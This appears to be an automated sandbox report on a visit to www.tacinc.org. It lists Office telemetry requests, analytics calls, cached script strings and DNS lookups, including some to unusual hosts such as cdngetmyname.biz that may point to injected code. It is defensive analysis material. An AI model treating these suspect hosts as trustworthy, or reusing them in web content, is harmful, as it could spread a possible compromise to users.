Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.tacinc.orgConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: chromecache_126.2.drString found in binary or memory: <a itemprop="sameAs" href="http://www.twitter.com/TACIncBoston" target="_blank" rel="noreferrer noopener" title="Go to TAC Twitter Channel."><span class="accessibility-text">Twitter Channel</span><i class="fa-brands fa-x-twitter" aria-hidden="true"></i></a> equals www.twitter.com (Twitter)
Source: chromecache_126.2.drString found in binary or memory: <a itemprop="sameAs" href="http://www.twitter.com/TACIncBoston" target="_blank" title="Go to TAC Twitter Channel."><span class="accessibility-text">Twitter Channel</span><i class="fa-brands fa-x-twitter" aria-hidden="true"></i></a> equals www.twitter.com (Twitter)
Source: chromecache_126.2.drString found in binary or memory: <a itemprop="sameAs" href="https://www.facebook.com/TACIncBoston/" target="_blank" rel="noreferrer noopener" title="Go to TAC Facebook Profile."><span class="accessibility-text">Facebook Profile</span><i class="fa-brands fa-facebook" aria-hidden="true"></i></a> equals www.facebook.com (Facebook)
Source: chromecache_126.2.drString found in binary or memory: <a itemprop="sameAs" href="https://www.facebook.com/TACIncBoston/" target="_blank" title="Go to TAC Facebook Profile."><span class="accessibility-text">Facebook Profile</span><i class="fa-brands fa-facebook" aria-hidden="true"></i></a> equals www.facebook.com (Facebook)
Source: chromecache_126.2.drString found in binary or memory: <a itemprop="sameAs" href="https://www.linkedin.com/company/tacincboston" target="_blank" rel="noreferrer noopener" title="Go to TAC Linkedin Profile."><span class="accessibility-text">Linkedin Profile</span><i class="fa-brands fa-linkedin-in" aria-hidden="true"></i></a> equals www.linkedin.com (Linkedin)
Source: chromecache_126.2.drString found in binary or memory: <a itemprop="sameAs" href="https://www.linkedin.com/company/tacincboston" target="_blank" title="Go to TAC Linkedin Profile."><span class="accessibility-text">Linkedin Profile</span><i class="fa-brands fa-linkedin-in" aria-hidden="true"></i></a> equals www.linkedin.com (Linkedin)
Source: chromecache_126.2.drString found in binary or memory: <meta property="article:publisher" content="https://www.facebook.com/TACIncBoston/" /> equals www.facebook.com (Facebook)
Source: chromecache_153.2.dr, chromecache_169.2.drString found in binary or memory: Math.round(q);u["gtm.videoElapsedTime"]=Math.round(f);u["gtm.videoPercent"]=r;u["gtm.videoVisible"]=t;return u},kk:function(){e=Ab()},ud:function(){d()}}};var hc=la(["data-gtm-yt-inspected-"]),lD=["www.youtube.com","www.youtube-nocookie.com"],mD,nD=!1; equals www.youtube.com (Youtube)
Source: chromecache_153.2.dr, chromecache_169.2.drString found in binary or memory: if(!(e||f||g||k.length||m.length))return;var p={oh:e,mh:f,nh:g,Yh:k,Zh:m,Ie:n,Eb:b},q=C.YT;if(q)return q.ready&&q.ready(d),b;var r=C.onYouTubeIframeAPIReady;C.onYouTubeIframeAPIReady=function(){r&&r();d()};F(function(){for(var t=E.getElementsByTagName("script"),v=t.length,u=0;u<v;u++){var w=t[u].getAttribute("src");if(wD(w,"iframe_api")||wD(w,"player_api"))return b}for(var x=E.getElementsByTagName("iframe"),y=x.length,A=0;A<y;A++)if(!nD&&uD(x[A],p.Ie))return yc("https://www.youtube.com/iframe_api"), equals www.youtube.com (Youtube)
Source: chromecache_161.2.dr, chromecache_124.2.drString found in binary or memory: return b}jD.F="internal.enableAutoEventOnTimer";var hc=la(["data-gtm-yt-inspected-"]),lD=["www.youtube.com","www.youtube-nocookie.com"],mD,nD=!1; equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: www.tacinc.org
Source: global trafficDNS traffic detected: DNS query: stats.wp.com
Source: global trafficDNS traffic detected: DNS query: use.typekit.net
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: p.typekit.net
Source: global trafficDNS traffic detected: DNS query: cdngetmyname.biz
Source: global trafficDNS traffic detected: DNS query: stats.wpmucdn.com
Source: global trafficDNS traffic detected: DNS query: pluralism.themancav.com
Source: global trafficDNS traffic detected: DNS query: stats1.wpmudev.com
Source: global trafficDNS traffic detected: DNS query: pixel.wp.com
Source: unknownHTTP traffic detected: POST /track/?action_name=The%20Technical%20Assistance%20Collaborative%20-%20TAC&idsite=42744&rec=1&r=954907&h=14&m=4&s=7&url=https%3A%2F%2Fwww.tacinc.org%2F&_id=9e2e685fff1c48d6&_idts=1729706647&_idvc=1&_idn=1&_refts=0&_viewts=1729706647&send_image=0&pdf=1&qt=0&realp=0&wma=0&dir=0&fla=0&java=0&gears=0&ag=0&cookie=1&res=1280x1024&gt_ms=1242&pv_id=uRcmW0 HTTP/1.1Host: stats1.wpmudev.comConnection: keep-aliveContent-Length: 0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencoded; charset=utf-8Accept: */*Origin: https://www.tacinc.orgSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.tacinc.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 23 Oct 2024 18:04:10 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: close
Source: chromecache_111.2.dr, chromecache_120.2.drString found in binary or memory: http://bestiejs.github.io/json3
Source: chromecache_157.2.drString found in binary or memory: http://daneden.me/animate
Source: chromecache_192.2.drString found in binary or memory: http://flickity.metafizzy.co
Source: chromecache_157.2.drString found in binary or memory: http://fontawesome.io
Source: chromecache_157.2.drString found in binary or memory: http://fontawesome.io/license
Source: chromecache_126.2.drString found in binary or memory: http://fonts.googleapis.com
Source: chromecache_157.2.drString found in binary or memory: http://getbootstrap.com)
Source: chromecache_111.2.dr, chromecache_120.2.drString found in binary or memory: http://kit.mit-license.org
Source: chromecache_157.2.drString found in binary or memory: http://opensource.org/licenses/MIT
Source: chromecache_126.2.drString found in binary or memory: http://schema.org/Organization
Source: chromecache_126.2.drString found in binary or memory: http://socialdriver.com
Source: chromecache_160.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b13ac
Source: chromecache_160.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b13ad
Source: chromecache_160.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b13ae
Source: chromecache_160.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b13af
Source: chromecache_160.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b13b0
Source: chromecache_160.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b13b1
Source: chromecache_160.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b13b2
Source: chromecache_160.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b13b3
Source: chromecache_160.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b13b4
Source: chromecache_160.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b13b5
Source: chromecache_160.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b13b6
Source: chromecache_160.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b13b7
Source: chromecache_160.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b13b8
Source: chromecache_160.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b13b9
Source: chromecache_160.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b13ba
Source: chromecache_160.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b13bb
Source: chromecache_160.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b13bc
Source: chromecache_160.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b13bd
Source: chromecache_160.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b305e
Source: chromecache_160.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b305f
Source: chromecache_160.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b3060
Source: chromecache_160.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b3061
Source: chromecache_160.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b3062
Source: chromecache_160.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b3063
Source: chromecache_160.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b3064
Source: chromecache_160.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b3065
Source: chromecache_160.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b3066
Source: chromecache_160.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b3067
Source: chromecache_160.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b3068
Source: chromecache_160.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b3069
Source: chromecache_160.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b306a
Source: chromecache_160.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b306b
Source: chromecache_160.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b306c
Source: chromecache_160.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b306d
Source: chromecache_160.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b306e
Source: chromecache_160.2.drString found in binary or memory: http://typekit.com/eulas/00000000000000003b9b306f
